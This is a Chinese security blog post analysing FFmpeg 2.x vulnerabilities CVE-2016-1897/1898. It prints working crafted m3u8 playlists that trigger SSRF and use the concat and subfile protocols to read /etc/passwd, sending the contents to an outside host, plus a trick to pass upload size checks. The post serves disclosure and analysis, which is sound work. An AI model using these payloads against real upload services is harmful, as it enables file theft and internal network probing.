0380-CVE-2016-1897-8 – FFMpeg漏洞分析

# CVE-2016-1897/8 – FFMpeg漏洞分析

**Author:数据流(LeeFly)@伏宸安全实验室**

0x00 前言
=======

* * *

这段时间有不少漏洞突然爆发,就像这几天的ImageMagick漏洞,横扫国内互联网。这一两天在乌云`@Noxxx`首先发了两个大厂商的FFmpeg的漏洞,然后也被其他白帽子陆续提交漏洞。影响范围和严重性虽然没有ImageMagick大,但也有不少大厂商中招,而它们共同之处都是处理文件的通用组件程序。可笑的是这个漏洞在上年五月份左右就被公布,并在国外一些CTF比赛中应用;直至现今国内的大厂商基本也都存在该漏洞。

FFmpeg是一套可以用来记录、转换数字音频、视频,并能将其转化为流的开源计算机程序。功能非常强大,是每个视频网站必不可少的多媒体文件处理程序。

0x01 漏洞概述
=========

* * *

在FFMpeg2.X 由于在解析HTTP Live Streaming流媒体m3u8文件处理不当,可导致SSRF漏洞与任意文件读取漏洞。当网站允许用户上传多媒体文件,并使用FFMpeg进行处理时会触发该漏洞。

这个漏洞有两个CVE编号,分别是CVE-2016-1897和CVE-2016-1898,它们两个的区别在于读取文件的行数,CVE-2016-1897只能读取文件的第一行,而CVE-2016-1898可以读取文件任意行,原理基本一样,这里就一起分析了。

0x02 HLS(HTTP Live Streaming)
=============================

* * *

由于漏洞是出现在解析HLS流媒体文件出的问题,所以我们必须先了解HLS。

HLS(HTTP Live Streaming)是Apple公司开发的一种基于HTTP协议的流媒体通信协议,大多数都应用在PC上和Iphone上。它的基本原理是把一个视频流分成很多个很小很小很小的ts流文件,然后通过HTTP下载,每次下载一点点。在一个开始一个新的流媒体会话时,客户端都会先下载一个m3u8(播放列表 Playlist)文件,里面包含了这次HLS会话的所有数据。

![](http://drops.javaweb.org/uploads/images/9ab383d998c3bf4a783f113e6731dad1be71be16.jpg)

如图所示,有一个主要的m3u8格式Playlist文件,里面可以包含下级的m3u8文件,客户端会再去索引下级的m3u8,继续解析下级的Playlist文件获取最终的TS流文件的http请求地址与时间段。

`http://pl.youku.com/playlist/m3u8?vid=340270152&type=3gphd&ts=1462714824&keyframe=0&ep=dSaSGE6MUssC5ybeiz8bYiXiIiZdXP0O9h2CgdNnAtQnS%2Bm2&sid=746271452251312590fab&token=3319&ctype=12&ev=1&oip=3395898128`

这是youku一个视频的m3u8文件,内容如下:

“`
#EXTM3U
#EXT-X-TARGETDURATION:6
#EXT-X-VERSION:2
#EXTINF:6,
http://183.60.145.83/69777D60D183E7FE8D0BC25A4/030002010056208D059E4E15049976CD642E01-C8E5-706F-DC6D-375DE0DA5A1E.flv.ts?ts_start=0&ts_end=5.9&ts_seg_no=0&ts_keyframe=1
#EXTINF:0,
http://183.60.145.83/69777D60D183E7FE8D0BC25A4/030002010056208D059E4E15049976CD642E01-C8E5-706F-DC6D-375DE0DA5A1E.flv.ts?ts_start=5.9&ts_end=6.367&ts_seg_no=1&ts_keyframe=1
#EXT-X-ENDLIST

“`

解析:

* #EXTM3U 标签是m3u8的文件头,开头必须要这一行
* #EXT-X-TARGETDURATION 表示整个媒体的长度 这里是6秒
* #EXT-X-VERSION:2 该标签可有可无
* #EXTINF:6, 表示该一段TS流文件的长度
* #EXT-X-ENDLIST 这个相当于文件结束符

这些是m3u8的最基本的标签,而问题就出在FFMpeg去请求TS流文件的时,由于我们可以伪造一个m3u8文件,FFMpeg不会判断里面的流地址,直接请求。

0x03 漏洞原理
=========

* * *

SSRF漏洞:

直接用FFMpeg解析一个多媒体文件

“`
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
http://192.168.123.100:8080/1.html
#EXT-X-ENDLIST

“`

(#EXT-X-MEDIA-SEQUENCE或#EXT-X-TARGETDURATION必须存在任意一个,前者是定义ts流文件的序号。去掉会报错:无效文件)

![](http://drops.javaweb.org/uploads/images/23511a2909030435f1e49f7b2149b77267aed2cd.jpg)

`ffmpeg -i test.m3u8 test.mp4`(也可把m3u8格式改成其他后缀,ffmpeg会自动识别为HLS流文件)

![](http://drops.javaweb.org/uploads/images/c75f722d74a1a66732ee5221a0d98eba98ab95de.jpg)

直接发起了http请求,这就造成一个SSRF。

结合SSRF任意文件读取:

FFMpeg支持很多扩展协议,其中的concat:协议可以合并多个流URL,官方称为Physical concatenation protocol

这样可以合并多个URL`concat:URL1|URL2|…|URLN`

新建一个主HLS文件h.m3u8在web服务器

“`
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://xxx/test.txt|http://xxx/test.txt (这两个txt都是m3u8,后缀可以随便改,ffmpeg会自动识别)
#EXT-X-ENDLIST

“`

再创建一个下级的m3u8文件 test.txt,最终的请求会引到最下级的m3u8文件,也就是这个test.txt

“`
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://xxx.com/?

“`

再用ffmpeg处理test.m3u8

“`
#EXTM3U
#EXT-X-TARGETDURATION:6
#EXTINF:10.0,
concat:http://xxx/h.m3u8
#EXT-X-ENDLIST

“`

![](http://drops.javaweb.org/uploads/images/635af3b464995f697787bac439b2d11266451445.jpg)

提示当读取第一段的时候出错,URL是`http://xxx/?#EXTM3U`,但我们建立的那个下级的m3u8文件 test.txt是`http://xxx.com/?`,多出来的“`#EXTM3U,`”这部分是用concat协议合并的那个txt,`http://xxx/test.txt`的第一行;而ffmpeg支持多种协议获取输入流,http、ftp、smb、file等,既然用concat协议可以读取文件的第一行,那把http换成file协议就可以读取本地文件了,漏洞就出在这里。

主m3u8文件改成`concat:http://xxx/test.txt|file:///etc/passwd`,再请求就能读取到passwd文件的第一行,当然也可以读取内网网站的信息。

![](http://drops.javaweb.org/uploads/images/fc009ae85f282f0df435b63bd63da4868c6d1b99.jpg)

但这样就只能读取一行,意义不大。但FFMpeg支持一个截取数据流片段的功能:subfile。用法:`subfile,,start,153391104,end,268142592,,:/media/dvd/VIDEO_TS/VTS_08_1.VOB`

Start后是开始截取的偏移量,以字节为单位,end是结束的偏移量。

既然可以截取数据流就可以利用subfile获取比较完整的文件了。测试时候一次最多只能截取32字节,所以要继续用concat合并多个数据流片段。

“`
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://198.56.193.29:8080/test.txt|subfile,,start,0,end,31,,:file:///etc/passwd|subfile,,start,32,end,63,,:file:///etc/passwd|subfile,,start,64,end,95,,:file:///etc/passwd|subfile,,start,96,end,127,,:file:///etc/passwd|subfile,,start,127,end,158,,:file:///etc/passwd
#EXT-X-ENDLIST

“`

这样就可以读取任意文件的任意内容

![](http://drops.javaweb.org/uploads/images/3771a177be181f524f27a8e186fdb3913f5e906c.jpg)

0x04 绕过大小检测
===========

* * *

之前的ImageMagick漏洞因为有些网站有文件大小检测而无法攻击,在这个漏洞中的测试我也发现一些网站有对上传视频文件的大小限制。这里有方法可以扩充文件大小。

![](http://drops.javaweb.org/uploads/images/97e7fa44b663635a212be0dec594a086e4e44a5b.jpg)

直接扩充#EXTINF,这个标签前面说过,是代表TS流文件的时间长度,可以无限扩充,直到符合大小为止,仍可正常解析。

0x05 漏洞影响
=========

* * *

我测试了国内的很多云盘与视频网站,都存在包括@Noxxx先提交的百度云盘,360原盘等,后来我测试了ku6,爱奇艺,56,搜狐等等都存在该问题,爱奇艺的我已经提交了,另外发现的很多也就没必要再提交了,刷洞没意思,提交一个案例警示一下就足够了。

以下总结一下在乌云报告过的FFMpeg漏洞:[百度云盘文件读取/SSRF](http://www.wooyun.org/bugs/wooyun-2010-0205320)、[360云盘文件读取/SSRF](http://www.wooyun.org/bugs/wooyun-2010-0205343)、[爱奇艺主站某处FFmpeg漏洞可导致任意文件读取](http://www.wooyun.org/bugs/wooyun-2010-0205669)、[56视频FFmpeg解析漏洞导致SSRF](http://www.wooyun.org/bugs/wooyun-2016-0205699)、[搜狐视频ffmpeg漏洞可文件读取/SSRF](http://www.wooyun.org/bugs/wooyun-2016-0205709)、[盛大某站存在SSRF可读取本地文件&探测内网](http://www.wooyun.org/bugs/wooyun-2016-0205719)等等

总的来说威胁还是蛮大的,很多大型厂商都中枪。之前上传图片会被搞,现在上传视频也会被搞。这些处理文件的通用程序真是黑客的乐土啊。

0x06 漏洞修复
=========

* * *

目前该漏洞已在FFMpeg**2.8.5**中修复,请广大用户马上升级。

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容